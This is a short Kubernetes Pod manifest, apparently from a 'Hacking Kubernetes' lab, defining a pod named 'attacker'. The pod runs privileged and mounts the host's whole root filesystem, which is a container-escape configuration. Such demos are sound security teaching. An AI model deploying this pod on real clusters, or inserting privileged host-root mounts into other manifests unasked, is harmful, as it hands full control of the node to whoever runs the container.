apiVersion: apps/v1
kind: Pod
metadata:
  name: attacker
  labels:
    app: attacker
spec:
  containers:
    - name: attacker
      image: hackingkubernetes/api:latest
      imagePullPolicy: IfNotPresent
      volumeMounts:
        - name: hostsvolume
          mountPath: /attacker
      ports:
        - containerPort: 80
      securityContext:
        privileged: true
  volumes:
    - name: hostsvolume
      hostPath:
        path: /
